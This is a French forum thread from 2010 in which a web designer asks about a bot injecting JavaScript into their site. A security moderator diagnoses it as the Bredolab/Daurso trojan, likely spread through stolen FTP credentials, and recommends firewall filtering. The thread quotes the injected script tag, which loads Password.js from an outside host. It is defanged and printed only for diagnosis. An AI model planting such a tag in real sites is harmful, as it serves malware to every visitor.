Javascript, insertion de virus par un bot
Résolu/Fermé
WebDesigner
Messages postés
74
Date d'inscription
mercredi 24 octobre 2007
Statut
Membre
Dernière intervention
10 septembre 2012
-
Modifié par WebDesigner le 7/07/2010 à 12:24
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 7 juil. 2010 à 20:30
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 7 juil. 2010 à 20:30
A voir également:
- Javascript, insertion de virus par un bot
- Designer bot - Guide
- Ernie bot - Guide
- Telecharger javascript - Télécharger - Langages
- Insertion signature word - Guide
- Insertion liste déroulante excel - Guide
11 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
Modifié par Malekal_morte- le 7/07/2010 à 12:24
Modifié par Malekal_morte- le 7/07/2010 à 12:24
Salut,
File le lien du site :)
ou montre la tete du javascript.
M'enfin c'est surement Bredo/Daurso :)
Rise Against rules :D
File le lien du site :)
ou montre la tete du javascript.
M'enfin c'est surement Bredo/Daurso :)
Rise Against rules :D
WebDesigner
Messages postés
74
Date d'inscription
mercredi 24 octobre 2007
Statut
Membre
Dernière intervention
10 septembre 2012
12
Modifié par crapoulou le 7/07/2010 à 13:12
Modifié par crapoulou le 7/07/2010 à 13:12
Le javascript se présente de cette façon :
Je t'ai envoyé le lien du site en mp.
Merci de m'avoir répondu.
<script type="text/javascript" src="[hxxp://questtore.hermosayasociados.com:8080/Password.js]"></script>
Je t'ai envoyé le lien du site en mp.
Merci de m'avoir répondu.
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
7 juil. 2010 à 13:46
7 juil. 2010 à 13:46
OK c'est bien du Bredolab/Daurso/Bunnix.
Lire le paragraphe Trojan.Daurso / Win32/Bubnix sur
https://forum.malekal.com/viewtopic.php?t=22837&start=
et :
https://forum.malekal.com/viewtopic.php?t=23617&start=
Donc y a des chances que ce soit par FTP, potentiellement il se peut qu'un des PC qui est utilisé pour se connecter au site soit infectée.
Donc là vu que t'as changé le pass ça doit limiter la casse, faudrait donner le nouveau mdp au compte goute et vérifier les machines qui se connectent au FTP.
PS : il peut aussi se connecter au FTP par bruteforce si le mot de passe était pas fort.
Lire le paragraphe Trojan.Daurso / Win32/Bubnix sur
https://forum.malekal.com/viewtopic.php?t=22837&start=
et :
https://forum.malekal.com/viewtopic.php?t=23617&start=
Donc y a des chances que ce soit par FTP, potentiellement il se peut qu'un des PC qui est utilisé pour se connecter au site soit infectée.
Donc là vu que t'as changé le pass ça doit limiter la casse, faudrait donner le nouveau mdp au compte goute et vérifier les machines qui se connectent au FTP.
PS : il peut aussi se connecter au FTP par bruteforce si le mot de passe était pas fort.
WebDesigner
Messages postés
74
Date d'inscription
mercredi 24 octobre 2007
Statut
Membre
Dernière intervention
10 septembre 2012
12
7 juil. 2010 à 14:28
7 juil. 2010 à 14:28
Merci beaucoup pour ta réponse, je vais lire tout çà ^^
Je te tiendrais au courant durant les semaines qui suivent pour voir son évolution.
Merci encore et bonne continuation
Je te tiendrais au courant durant les semaines qui suivent pour voir son évolution.
Merci encore et bonne continuation
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
7 juil. 2010 à 14:58
7 juil. 2010 à 14:58
Si tu as un doute sur une machine, on peux regarder pour déterminer si elle est infectée :)
WebDesigner
Messages postés
74
Date d'inscription
mercredi 24 octobre 2007
Statut
Membre
Dernière intervention
10 septembre 2012
12
7 juil. 2010 à 17:30
7 juil. 2010 à 17:30
Tes articles sont vraiment très intéressants !
J'utilise plusieurs machines en effet pour me connecter via FTP sur le serveur.
- Le premier est celui de mon client pour que la personne chargée des mises à jours puisse se connecter et uploader des fichiers PDF, images etc...
- Les deux autres sont mon ordinateur portable en cas d'absence et mon fixe pour travailler de chez moi.
En général, je fais très attention pour qu'aucun de mes outils soient infectés par quoi que se soit, j'utilise alors spybot search and destroy, j'ignore si cela est suffisant.
En revanche, la machine de mon client est utilisée un peu n'importe comment, que se soit pour naviguer sur le web, envoyer des newsletters, se charger d'envoyer des fichiers par FTP avec Filezilla, je ne me charge jamais d'un contrôle sur leur machine pour nettoyer leur disque ou vérifier un éventuel trojan, spyware etc...
Demain je dois passer chez eux pour faire le point avec leur installation informatique qui me pose un soucis, car je ne veux en aucun cas, que mon client me reproche de ne pas sécuriser leur site si leur PC est constamment soumis à des attaques.
J'utilise plusieurs machines en effet pour me connecter via FTP sur le serveur.
- Le premier est celui de mon client pour que la personne chargée des mises à jours puisse se connecter et uploader des fichiers PDF, images etc...
- Les deux autres sont mon ordinateur portable en cas d'absence et mon fixe pour travailler de chez moi.
En général, je fais très attention pour qu'aucun de mes outils soient infectés par quoi que se soit, j'utilise alors spybot search and destroy, j'ignore si cela est suffisant.
En revanche, la machine de mon client est utilisée un peu n'importe comment, que se soit pour naviguer sur le web, envoyer des newsletters, se charger d'envoyer des fichiers par FTP avec Filezilla, je ne me charge jamais d'un contrôle sur leur machine pour nettoyer leur disque ou vérifier un éventuel trojan, spyware etc...
Demain je dois passer chez eux pour faire le point avec leur installation informatique qui me pose un soucis, car je ne veux en aucun cas, que mon client me reproche de ne pas sécuriser leur site si leur PC est constamment soumis à des attaques.
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
Modifié par Malekal_morte- le 7/07/2010 à 18:07
Modifié par Malekal_morte- le 7/07/2010 à 18:07
Good :)
Déjà Spybot tu pourras le désinstaller, il est inefficace.
En ce qui concerne le site, si vous avez la main sur les machines (serveurs dédiés), comme cela est dit à la fin de la page que je t'ai donnée.
Je vous conseille très fortement de filtrer le service FTP, il est très ciblé.
Si vos clients ont des IP fixes (et vous aussi) vous devriez ouvrir le port que pour vos IP.
Si vos clients ont des IP dynamiques, vous devriez ajouter des règles pour filtrer les IP des pays suivants : Russie, Ukraine, Roumanie et Chine.
Généralement les machines utilisées pour ajouter les iframes ont des IP Chinoises :)
Si le mot de passe est récupérée, ça limitera déjà la casse.
Rise Against rules :D
Déjà Spybot tu pourras le désinstaller, il est inefficace.
En ce qui concerne le site, si vous avez la main sur les machines (serveurs dédiés), comme cela est dit à la fin de la page que je t'ai donnée.
Je vous conseille très fortement de filtrer le service FTP, il est très ciblé.
Si vos clients ont des IP fixes (et vous aussi) vous devriez ouvrir le port que pour vos IP.
Si vos clients ont des IP dynamiques, vous devriez ajouter des règles pour filtrer les IP des pays suivants : Russie, Ukraine, Roumanie et Chine.
Généralement les machines utilisées pour ajouter les iframes ont des IP Chinoises :)
Si le mot de passe est récupérée, ça limitera déjà la casse.
Rise Against rules :D
WebDesigner
Messages postés
74
Date d'inscription
mercredi 24 octobre 2007
Statut
Membre
Dernière intervention
10 septembre 2012
12
7 juil. 2010 à 18:17
7 juil. 2010 à 18:17
Merci pour ta réponse :D
Je suis allé faire un tour sur ton forum pour sécuriser mon pc et oublier spybot de suite.
Lorsque tu conseilles de filtrer nos adresses IP, devrais-je passer par le .htaccess pour autoriser uniquement que nos adresses ou dois-je le faire ailleurs
?
Je suis allé faire un tour sur ton forum pour sécuriser mon pc et oublier spybot de suite.
Lorsque tu conseilles de filtrer nos adresses IP, devrais-je passer par le .htaccess pour autoriser uniquement que nos adresses ou dois-je le faire ailleurs
?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
Modifié par Malekal_morte- le 7/07/2010 à 18:21
Modifié par Malekal_morte- le 7/07/2010 à 18:21
Non, je parle de bloquer le port du FTP via des règles firewall afin de n'autoriser que vos IP (si elles sont fixes ).
ou bloquer les IP des pays cités afin qu'ils ne puissent pas s'y connecter.
Si le mot de passe est récupéré la connexion FTP ne pourra pas se faire et ils ne pourront pas modifier les sites.
Donc rien à voir avec un .htaccess :)
Rise Against rules :D
ou bloquer les IP des pays cités afin qu'ils ne puissent pas s'y connecter.
Si le mot de passe est récupéré la connexion FTP ne pourra pas se faire et ils ne pourront pas modifier les sites.
Donc rien à voir avec un .htaccess :)
Rise Against rules :D
WebDesigner
Messages postés
74
Date d'inscription
mercredi 24 octobre 2007
Statut
Membre
Dernière intervention
10 septembre 2012
12
7 juil. 2010 à 18:33
7 juil. 2010 à 18:33
D'accord ^^
Donc sécuriser nos clients FTP par le mode actif avec nos adresses ip fixes, c'est çà ?
Donc sécuriser nos clients FTP par le mode actif avec nos adresses ip fixes, c'est çà ?
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
7 juil. 2010 à 20:30
7 juil. 2010 à 20:30
heu non, enfin je suis pas certains que tu aies bien compris de quoi je parle.
Je parle de mettre des règles sur le firewall du serveur pour filtrer les connexions entrantes vers le FTP pour bloquer certaines plages d'IP.
Je peux pas faire plus simple comme explication :\
Je parle de mettre des règles sur le firewall du serveur pour filtrer les connexions entrantes vers le FTP pour bloquer certaines plages d'IP.
Je peux pas faire plus simple comme explication :\